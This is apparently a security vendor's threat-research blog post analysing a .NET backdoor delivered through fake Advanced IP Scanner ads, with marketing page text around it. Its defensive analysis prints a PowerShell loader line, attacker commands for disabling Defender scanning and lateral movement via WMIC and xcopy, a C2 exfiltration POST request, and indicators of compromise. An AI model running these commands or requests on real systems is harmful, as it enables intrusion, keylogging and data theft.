Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
Latest Update: January 12th, 2023 - The backdoor reported by @G60930953 is identified as ThunderShell, an open-source RAT available on GitHub. ConnectWise, naming it Parcel RAT, and Mandiant, calling it SMOKEDHAM, have also reported on this malware.
Top of Form
In November 2023, eSentire’s Threat Response Unit (TRU) detected WorkersDevBackdoor malware impacting a customer in business services industry. This malware spreads through malicious online ads, tricking users into downloading it by mimicking legitimate software. Once installed, it secretly collects sensitive information and provides backdoor access to the infected system. The full infection chain with the suspicious PowerShell command is shown in Figure 1.
The initial infection vector was a drive-by download via a Google Search advertisement. The service can be used to distribute malware to targets within an ideal group, such as network administrators without knowledge of their email address (something that would be required for malware delivered via email). Compounding this problem is the inherent trust that the platform is filtering malicious content, and email-oriented security awareness programs.
In this case, the user had searched for the Advanced IP Scanner application and downloaded the malicious installer from an imposter website at advanced-ip-scanners[.]net. The malicious installer was created using NSIS (Nullsoft Scriptable Install System), an open-source system used to create Windows installers. Upon unpacking the installer, we see the ZIP archive named WindowsDev.7z.
NSIS-generated installers come with NSIS.ini script that automates the installation process. We can view the INI file with 7z but the latest versions of 7z cannot see the INI file, we will use the older version instead (7z 9.38).
The [NSIS].ini script performs the actions listed in Figure 3.
The batch file NodejsToolsVsix.bat contains the code to set the PowerShell Path. It sets a variable LinkRunPS to the default PowerShell path. This is used to ensure the script uses the correct version of PowerShell. The IF statement checks the system architecture and adjusts the PowerShell path if the system is 64-bit. Then it executes the batch script via InvokeScript (Figure 6).
Let’s briefly look at the PowerShell script. The command “$UMGHyr0wTZa2 = convertto-securestring -String $k2FJj7u5G1vW -Key ($5ob67dVlTngs)” is creating a secure string using the convertto-securestring cmdlet. It decrypts the data (2) under $k2FJj7u5G1vW with the key (1) under $5ob67dVlTngs variable. The last line (3) calls a static method HMEqRPzgHocKlu on a class RZjKVf.ovbEFleTI, which is defined in the injected code. The method takes three parameters, including a URL and two other strings (Figure 7).
The encrypted data is the .NET payload that gets loaded in memory upon the execution of the PowerShell script.
In Figure 8 we see the function responsible for creating a seed for the random number generator. The seed is a bitwise XOR of the current process's ID and the number of seconds since January 1, 1970 (Unix epoch time). This approach makes the random seed more unique and less predictable. The conditional statement “if (fzBoRxFO == 0) { fzBoRxFO = random.Next(1, 16)” determines the length of the generated string.
If the fzBoRxFO parameter is 0, the length is set to a random value between 1 and 15. The “for” loop iterates 15 times, each time appending a randomly selected character from the text string to a StringBuilder object. The generated string is then used as a part of the URL path to send POST requests of the victim’s data to C2. The function is also used to generate a unique ID for the infected machine to communicate with C2.
You can see the example of randomly generated strings in traffic capture in Figure 9.
The function in Figure 10 creates as formatted string consisting of the string “register”, unique ID created. The method ZyKZ() is creating a string that combines the computer name, user domain, and username into a single string and appending it to the formatted string to send out to the C2 upon initial infection (registering the infected host).
The formatted string is then encrypted with RC4 with the hardcoded key in the PowerShell script, gets base64-encoded, and is sent out to C2 in the following JSON format:
The script sleeps for 1000 milliseconds and awaits the response/further commands from C2. The commands from C2 are also RC4-encrypted with the same key and base64-encoded. The first automated command from C2 is “whoami”.
Further on, the script sleeps for the amount of time assigned in the PowerShell script (in our case it’s 75000 milliseconds) each time after it receives the response from the C2. After approximately 6-10 minutes after the malicious payload execution have observed the threat actors running the following commands on the infected host:
<ul><li>net user</li><li>nslookup -type=srv_ldap._tcp.<redacted></redacted></li><li>systeminfo</li><li>whoami</li><li>"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\</li><li>"C:\Windows\System32\Wbem\WMIC.exe" /node:<redacted> process call create "cmd.exe /c c:\programdata\Microsoft\LogConverter\Microsoft.NodejsTools.PressAnyKey.lnk" (the threat actor attempted to move laterally to another host via WMIC)</redacted></li><li>"C:\Windows\system32\xcopy.exe" c:\programdata\microsoft\LogConverter \\<redacted>\C$\programdata\Microsoft\LogConverter /E /H /Y (the threat actor attempted to copy the malicious file to another host)</redacted></li></ul>
We have named the .NET backdoor “WorkDevBackdoor”. The backdoor also has keylogger functionality and retrieves the title of the currently active window (Figure 11). The captured input is then base64-encoded and appended with the GUID parameter of the infected host along with the string “userinput”.
Here is the example of the POST request sent to C2:
POST hxxps://cdn-us-tech.wtf-system-4758995.workers[.]dev/MsB0h/ HTTP/1.1 User-Agent: Microsoft Windows NT 10.0.16299.0 Content-Type: application/json Host: cdn-us-tech.wtf-system-4758995.workers[.]dev Content-Length: 131 Expect: 100-continue Connection: Keep-Alive {"UUID":<REDACTED>,"ID":"sMsB0hNEMIglZ8J8","Data":<base64-encoded string”>}
We did some research and found a similar chain of infection described by @0xBurgers (Figure 12).
You can access the Yara rules for WorkDevBackdoor here.
Our machine-learning powered PowerShell classifier, BlueSteel, detected the execution of the suspicious PowerShell command.
Our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat and notified the customer of suspicious activities.
Protecting against malware requires a multi-layered defense approach to defend endpoints from malware and detect or block unauthorized login activity against applications and remote access services. Therefore, we recommend:
Name |
Indicators |
Advanced_IP_Scanner_2.5.4594.1 |
521210e39b5b8364d34e62cb3cb9e9cd |
LogConverter |
a607e92aa155168de57e39d3b0d1b7e0 |
Microsoft.NodejsTools.PressAnyKey.exe |
1b1ec901b4f4374d361d4839d0e53523 |
Microsoft.NodejsTools.PressAnyKey.lnk |
f6f4b821716053e03c911417ef1c2c99 |
CG6oDkyFHl3R.t |
646ed75ae910483b8ee009b23d83d4e0 |
q8DTE1uLaXRG.t |
6180c6c92c0eba74f9871863d308c8cb |
WorkDevBackdoor |
d606255c411445b210ecd437faa6b43e |
WorkDevBackdoor C2 |
cdn-us-tech.wtf-system-4759011.workers[.]dev |
WorkDevBackdoor C2 |
cdn-us-tech.wtf-system-4758995[.]workers.dev |
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.